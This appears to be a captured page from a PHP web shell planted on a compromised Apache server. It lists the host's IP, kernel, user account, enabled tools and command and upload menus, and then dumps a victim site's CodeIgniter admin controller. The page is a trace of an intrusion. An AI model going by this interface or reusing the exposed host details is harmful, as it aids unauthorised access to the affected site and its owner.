GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.117.75.218 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../web/../cas/application/controllers/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Controller For Handling All Requests Related To Courses And Sub-Courses * * @author Softpro India Pvt. Ltd. */ class CourseAndSubCourse extends CI_Controller { public function __construct() { parent::__construct(); $this->load->helper('url'); $this->load->model('admin/UCSMappingManagement'); } public function getEntryTypesOfGivenCourseSessionAndBranch() { $branch_id = $_POST['branch_id']; $course_id = $_POST['course_id']; $session_id = $_POST['session_id']; $query = $this->UCSMappingManagement->getEntryTypesInfoBy($branch_id, $session_id, $course_id); $allEntryTypeList = $query->result(); if (sizeof($allEntryTypeList)) { $subCourseType = ""; $options = "<option value=''>All</option>"; for ($i = 0; $i < (sizeof($allEntryTypeList)); $i++) { $subCourseType = ($i == 0)?"Lateral Entry":"Regular"; if ($allEntryTypeList[$i]->ucs_rg_le_active_status == 'T') { $options .= "<option value=" . $allEntryTypeList[$i]->ucs_map_id . ">" . $subCourseType . "</option>"; } else { $options .= "<option value=" . $allEntryTypeList[$i]->ucs_map_id . " disabled>" . $subCourseType . " (This Entry Type Is Not Allowed In The Selected Course/Session)</option>"; } } $responseData = array( 'csrfName' => $this->security->get_csrf_token_name(), 'csrfHash' => $this->security->get_csrf_hash(), 'entryTypeList' => $options ); } else { $options = "<option value=''>No Entry Type Available</option>"; $responseData = array( 'csrfName' => $this->security->get_csrf_token_name(), 'csrfHash' => $this->security->get_csrf_hash(), 'entryTypeList' => $options ); } echo json_encode($responseData); } }